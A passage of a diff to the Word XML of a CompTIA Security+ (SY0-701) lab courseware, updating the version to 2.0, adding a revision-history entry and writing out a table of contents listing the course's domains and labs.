--- a/courseware/LG-CompTIA Security+ (SY0-701).docx
+++ b/courseware/LG-CompTIA Security+ (SY0-701).docx
@@ -179,7 +179,7 @@
           <w:color w:val="1F6FEB"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>Version 1.0</w:t>
+        <w:t>Version 2.0</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -341,6 +341,64 @@
           </w:p>
         </w:tc>
       </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2160"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+              </w:rPr>
+              <w:t>2.0</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2160"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+              </w:rPr>
+              <w:t>18 August 2026</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2160"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+              </w:rPr>
+              <w:t>Expanded to 43 labs and reorganised to the SY0-701 exam domains (5-day delivery); added container, RAID, cloud-IAM, packet-analysis, mobile-hardening, media-sanitisation and digital-forensics labs.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2160"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+              </w:rPr>
+              <w:t>Dr. Alfred Ang</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
     </w:tbl>
     <w:p>
       <w:r>
@@ -361,12 +419,1053 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-        <w:instrText xml:space="preserve">TOC \o "1-3" \h \z \u</w:instrText>
-        <w:fldChar w:fldCharType="separate"/>
-        <w:t>Right-click and choose “Update Field”, or press F9, to build the table of contents.</w:t>
-        <w:fldChar w:fldCharType="end"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Introduction</w:t>
+        <w:tab/>
+        <w:t>4</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Course Learning Outcomes</w:t>
+        <w:tab/>
+        <w:t>4</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Before You Start — Environment Setup</w:t>
+        <w:tab/>
+        <w:t>4</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Domain 01 — General Security Concepts  (12%)</w:t>
+        <w:tab/>
+        <w:t>5</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 1 — Security Controls Categorization</w:t>
+        <w:tab/>
+        <w:t>5</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 2 — CIA Triad and AAA on Linux</w:t>
+        <w:tab/>
+        <w:t>7</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 3 — Hashing, Salting, and Digital Signatures</w:t>
+        <w:tab/>
+        <w:t>9</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 4 — Symmetric vs. Asymmetric Encryption</w:t>
+        <w:tab/>
+        <w:t>10</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 5 — PKI: Build Your Own Certificate Authority</w:t>
+        <w:tab/>
+        <w:t>11</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Domain 02 — Threats, Vulnerabilities &amp; Mitigations  (22%)</w:t>
+        <w:tab/>
+        <w:t>13</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 6 — Phishing Email Header Analysis (SPF / DKIM / DMARC)</w:t>
+        <w:tab/>
+        <w:t>13</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 7 — Password Attacks: Spraying, Brute Force, Cracking</w:t>
+        <w:tab/>
+        <w:t>15</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 8 — Malware Static Analysis (Safe Sample)</w:t>
+        <w:tab/>
+        <w:t>16</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 9 — SQL Injection (SQLi)</w:t>
+        <w:tab/>
+        <w:t>18</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 10 — Cross-Site Scripting (XSS)</w:t>
+        <w:tab/>
+        <w:t>19</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 11 — DoS Simulation and Detection</w:t>
+        <w:tab/>
+        <w:t>21</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 12 — Vulnerability Scanning with Nikto and Nuclei</w:t>
+        <w:tab/>
+        <w:t>22</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 13 — Linux Hardening Baseline with Lynis</w:t>
+        <w:tab/>
+        <w:t>24</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Domain 03 — Security Architecture  (18%)</w:t>
+        <w:tab/>
+        <w:t>25</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 14 — Network Segmentation with Linux Namespaces</w:t>
+        <w:tab/>
+        <w:t>26</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 15 — Stateful Firewall with UFW and nftables</w:t>
+        <w:tab/>
+        <w:t>27</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 16 — Web Application Firewall with ModSecurity</w:t>
+        <w:tab/>
+        <w:t>28</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 17 — Site-to-Site VPN with WireGuard</w:t>
+        <w:tab/>
+        <w:t>30</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 18 — Data at Rest: LUKS Full-Disk Encryption</w:t>
+        <w:tab/>
+        <w:t>31</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 19 — TLS Hardening and Cipher Audit</w:t>
+        <w:tab/>
+        <w:t>33</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 20 — Backup and Recovery with restic</w:t>
+        <w:tab/>
+        <w:t>34</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 37 — Cloud Shared Responsibility &amp; IAM Least Privilege</w:t>
+        <w:tab/>
+        <w:t>35</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 38 — Container Security with Docker</w:t>
+        <w:tab/>
+        <w:t>37</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 39 — Storage Resilience with Software RAID (mdadm)</w:t>
+        <w:tab/>
+        <w:t>38</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Domain 04 — Security Operations  (28%)</w:t>
+        <w:tab/>
+        <w:t>39</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 21 — SSH Hardening + Fail2ban</w:t>
+        <w:tab/>
+        <w:t>40</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 22 — IAM with PAM and sudo</w:t>
+        <w:tab/>
+        <w:t>42</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 23 — Multi-Factor Authentication with TOTP</w:t>
+        <w:tab/>
+        <w:t>43</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 24 — SIEM Basics with Wazuh</w:t>
+        <w:tab/>
+        <w:t>44</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 25 — Network IDS with Suricata</w:t>
+        <w:tab/>
+        <w:t>46</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 26 — Endpoint Detection with osquery</w:t>
+        <w:tab/>
+        <w:t>47</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 27 — File Integrity Monitoring with AIDE</w:t>
+        <w:tab/>
+        <w:t>49</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 28 — Vulnerability Management with Trivy</w:t>
+        <w:tab/>
+        <w:t>51</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 29 — Incident Response and Forensics</w:t>
+        <w:tab/>
+        <w:t>53</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 30 — Automation and Orchestration (Mini-SOAR)</w:t>
+        <w:tab/>
+        <w:t>54</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 40 — Packet Capture &amp; Traffic Analysis</w:t>
+        <w:tab/>
+        <w:t>56</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 41 — Mobile &amp; Endpoint Hardening Baseline</w:t>
+        <w:tab/>
+        <w:t>57</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 42 — Secure Data Sanitisation (Media Disposal)</w:t>
+        <w:tab/>
+        <w:t>59</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 43 — Digital Forensics — Evidence Acquisition &amp; Hashing</w:t>
+        <w:tab/>
+        <w:t>60</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Domain 05 — Security Program Management &amp; Oversight  (20%)</w:t>
+        <w:tab/>
+        <w:t>61</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 31 — Risk Register, CVSS Scoring, and Quantitative Risk</w:t>
+        <w:tab/>
+        <w:t>62</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 32 — Passive Reconnaissance / OSINT</w:t>
+        <w:tab/>
+        <w:t>63</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
